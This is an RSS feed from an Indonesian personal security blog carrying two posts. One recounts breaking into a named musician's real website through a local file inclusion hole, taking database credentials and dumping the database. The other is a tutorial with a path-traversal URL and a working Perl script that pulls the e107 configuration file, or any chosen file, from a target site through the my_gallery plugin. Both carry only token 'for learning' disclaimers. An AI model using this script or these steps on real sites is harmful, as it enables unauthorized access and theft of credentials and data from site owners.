﻿﻿﻿<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NitrouZ Personal Pages &#187; vulnerable</title>
	<atom:link href="http://xtremenitro.org/tag/vulnerable/feed" rel="self" type="application/rss+xml" />
	<link>http://xtremenitro.org</link>
	<description>Do What The Fvck You Want To</description>
	<lastBuildDate>Tue, 07 Feb 2012 08:17:14 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>LFI Di Situs Michael Heart</title>
		<link>http://xtremenitro.org/2009/01/27/lfi-di-situs-michael-heart.html</link>
		<comments>http://xtremenitro.org/2009/01/27/lfi-di-situs-michael-heart.html#comments</comments>
		<pubDate>Mon, 26 Jan 2009 23:32:47 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[heart]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[michael]]></category>
		<category><![CDATA[vulnerable]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=938</guid>
		<description><![CDATA[Disclaimer Artikel ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tulisan ini. Intro Sebenarnya ini sudah basi, dan mungkin repost. Tapi biar repost, yang penting happy&#8482;. Beberapa waktu lalu, ketika terjadi konflik Israel &#8211; Palestina di Gaza, ada seorang musisi bernama Michael Heart yang menuangkannya dalam lagu berjudul &#34;We Will [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer</b><br/><br />
Artikel ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tulisan ini.</p>
<p><b>Intro</b><br/><br />
Sebenarnya ini sudah basi, dan mungkin repost. Tapi biar repost, yang penting happy&trade;. Beberapa waktu lalu, ketika terjadi konflik Israel &#8211; Palestina di Gaza, ada seorang musisi bernama Michael Heart yang menuangkannya dalam lagu berjudul &quot;We Will Not Go Down&quot; dan lagu itu sendiri bebas di-download. Saya sendiri sudah men-download lagu tersebut. Tapi pada artikel ini, kita tidak akan membahas lagu tersebut melainkan celah yang terdapat pada situs Michael Heart.</p>
<p><b>The Proof</b><br/><br />
Langsung saja, saya menuju ke URL lagunya:</p>
<pre>http://www.michaelheart.com/sfg/downloads/a22685d/dl.php?file=we_will_not_go_down.mp3</pre>
<p>Coba perhatikan URL di atas, sudah tahu kan letak celahnya. Yup, LFI. Kalau belum mengerti, coba ditanyakan ke mbah google. Ok, singkat kata singkat cerita, dengan sedikit trik pada celah tersebut maka bisa diperoleh username dan password untuk databasenya. Dan lebih mudah lagi karena ternyata server databasenya terbuka untuk public menurut informasi dari nmap. Setelah tahu kondisi tersebut, coba kita koneksi ke server tersebut dengan username dan password yang sudah ada:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2009/01/ss_mh_00.png" /><br/><br/><br />
Ternyata bisa :| &#8230; dan selanjutnya kita lihat databasenya. hmmm&#8230; ada satu database yang menarik. Ok, kita coba lihat tables yang ada pada database tersebut.<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2009/01/ss_mh_01.png" /><br/><br/><br />
Ok, cukup sekian acara melihat-lihatnya. Sekarang, kita dump saja databasenya biar bisa dipelajari isinya.<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2009/01/ss_mh_02.png" /><br/><br/><br />
Ukuran dumpnya tidak terlalu besar tapi karena bandwidth yang < 1 kbps jadi prosesnya lama (lol). Nah, setelah selesai dan matang, hasilnya seperti ini:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2009/01/ss_mh_03.png" /><br/><br/></p>
<p><b>Outro</b><br/><br />
Kalau tidak salah, celahnya sudah diperbaiki oleh yang bersangkutan. Akhir kata, artikel ini sangat sederhana dan kemungkinan besar hanya menjadi hiburan / bahan tertawaan bagi para 1337 &#8230; jadi saya mohon maaf jika demikian adanya. Kritik, saran dan caci-maki, silakan dituangkan pada comments.</p>
<p><b>Terima Kasih</b><br/><br />
Tanpa urutan: NitrouZ, dylavig, sakitjiwa, fl3xu5, k0il, d3l (terima kasih atas dukungannya), pinczakko, kris kaspersky, dan Anda :)</p>
]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2009/01/27/lfi-di-situs-michael-heart.html/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>[Tutorial] Contoh Exploitasi Vulnerabilities Pada e107</title>
		<link>http://xtremenitro.org/2008/12/07/tutorial-contoh-exploitasi-vulnerabilities-pada-e107.html</link>
		<comments>http://xtremenitro.org/2008/12/07/tutorial-contoh-exploitasi-vulnerabilities-pada-e107.html#comments</comments>
		<pubDate>Sat, 06 Dec 2008 23:19:55 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Programming & Scripting]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[contoh]]></category>
		<category><![CDATA[e107]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[vulnerable]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=555</guid>
		<description><![CDATA[Disclaimer Tutorial ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tutorial ini. Use at your own risk. Ilustrasi Awalnya saya ingin membuat tutorial tentang javascript, namun entah mengapa tiba-tiba muncul keinginan untuk mencari hal yang menarik. Akhirnya saya coba browsing ke sana kemari hingga tiba di salah satu situs yang [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer</b><br />
Tutorial ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tutorial ini. Use at your own risk.<br/><br/><br />
<b>Ilustrasi</b><br />
Awalnya saya ingin membuat tutorial tentang javascript, namun entah mengapa tiba-tiba muncul keinginan untuk mencari hal yang menarik. Akhirnya saya coba browsing ke sana kemari hingga tiba di salah satu situs yang cukup menarik karena menggunakan <a href="http://e107.org/">e107</a>. Dan setelah saya perhatikan sebentar, ternyata situs tersebut terdapat plugin <font color="#0000ff">my_gallery</font>. Karena penasaran, saya coba mencari vulnerabilities e107 di <a href="http://www.milw0rm.com/">milw0rm</a>, dan kebetulan ketemu vulnerabilities untuk plugin tersebut, seperti pada gambar berikut ini:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_00.png"><br/><br/><br />
Ternyata plugin tersebut memungkinkan local file download :) hmmm&#8230; menarik. Ok, akhirnya saya mendownload e107 untuk mencari tahu apa saja file-file penting pada e107. Setelah diekstrak, saya lihat ada file <font color="#0000ff">e107_config.php</font> dan ternyata file tersebut kosong. Dari situ saya mengambil kesimpulan sementara bahwa file tersebut akan diisi oleh e107 pada saat instalasi:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_01.png"><br/><br/><br />
Selain hal tersebut, saya juga memperhatikan bahwa di sana ada file <font color="#0000ff">class2.php</font> dan ternyata setelah diperhatikan secara seksama dalam tempo yang sesingkat-singkatnya :D ternyata benar, file <font color="#0000ff">e107_config.php</font> akan diisi oleh e107 ketika instalasi berlangsung:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_02.png"><br/><br/><br />
Sekarang, saya kembali ke browser untuk mencoba apakah jurusnya ampuh B-) dan ternyata benar. File konfigurasi e107 bisa diakses pada path <font color="#ff0000">../../e107_config.php</font> jadi, bentuk url selengkapnya seperti ini:</p>
<blockquote><p>http://<font color="#ff0000">www.target.com</font>/e107_plugins/my_gallery/dload.php?file=../../e107_config.php</p></blockquote>
<p>Contohnya seperti ini:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_03.png"><br/><br/><br />
Nah, daripada menggunakan browser, bagaimana jika kita membuat script sederhana untuk memudahkan proses ini :D . Jadi script ini akan menerima 2 parameter dimana parameter terakhir sifatnya optional yaitu nama file pada target yang ingin dilihat. Jika parameter tersebut kosong, maka akan mencoba membuka file configurasi e107. Nah, berikut ini snippetnya dalam bahasa perl (maaf kodenya kacau maklum saya bukan programmer):</p>
<pre>
#!/usr/bin/perl

use LWP::UserAgent;

die("[i] aturan pakai: e107conf.pl &lt;website&gt; [file]\n") unless @ARGV &gt; 0;
$ua = LWP::UserAgent-&gt;new;
$fx = ($ARGV[1] eq '') ? "../../e107_config.php" : $ARGV[1];
$ex = $ua->request(HTTP::Request-&gt;new(GET => "http://".$ARGV[0]."/e107_plugins/my_gallery/dload.php?file=".$fx));

if ($ex-&gt;is_success) { print "[+] web: ".$ARGV[0]."\n".$ex-&gt;content."\n"; }
</pre>
<p>Nah, berikut ini 2 screenshot ketika script ini bekerja dimana pada screenshot pertama kita hanya memberikan alamat website yang ingin dieksploitasi, sedangkan pada screenshot ke-2 kita memberikan parameter ke-2 yaitu nama file yang ingin dilihat :) <br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_04.png"><br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_05.png"><br/><br/><br/><br/><br />
<b>Penutup</b><br />
Sekian dulu tutorial sederhana dari saya, semoga bisa bermanfaat untuk Anda. Sampai jumpa di tutorial berikutnya :)<br/><br/><br />
<b>Ucapan Terima Kasih</b><br />
Tanpa Urutan: Tuhan Yang Maha Esa, NitrouZ, pinczakko, hddstudio, dylavig, LiFe, LucuBRB, 4NV|e, movzx, k0il, semua rekan-rekan yang tidak sempat saya sebutkan satu-satu di sini (you know who you are) :) dan Anda yang telah membaca tutorial ini&#8230; (terima kasih telah membaca tutorial ini)&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2008/12/07/tutorial-contoh-exploitasi-vulnerabilities-pada-e107.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

